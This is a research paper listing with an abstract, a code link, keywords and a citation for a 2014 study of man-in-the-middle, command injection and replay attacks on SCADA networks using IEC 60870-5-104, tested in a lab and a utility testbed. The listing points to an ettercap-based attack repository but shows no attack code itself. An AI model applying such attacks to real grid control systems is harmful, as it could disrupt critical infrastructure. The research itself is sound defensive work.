This paper investigates cyber attacks on ICS which rely on IEC 60870-5-104 for telecontrol communications. The main focus of the paper is on man-in-the-middle attacks, covering modification and injection of commands, it also details capture and replay attacks. An initial set of attacks are preformed on a local software simulated laboratory. Final experiments and validation of a man-in-the-middle attack are performed in a comprehensive testbed environment in conjunction with an electricity distribution operator.
Code available at https://github.com/PMaynard/ettercap-104-mitm
2nd International Symposium for ICS & SCADA Cyber Security Research (2014)
SCADA, Cyber-security, Man-in-the-middle attacks, IEC 60870-5-104
@conference{
author = "Peter Maynard and Kieran McLaughlin and Berthold Haberler",
title = "Towards Understanding Man-In-The-Middle Attacks on IEC 60870-5-104 SCADA Networks",
journal = "2nd International Symposium for ICS & SCADA Cyber Security Research",
year = "2014",
doi = "http://dx.doi.org/10.14236/ewic/ics-csr2014.5"
}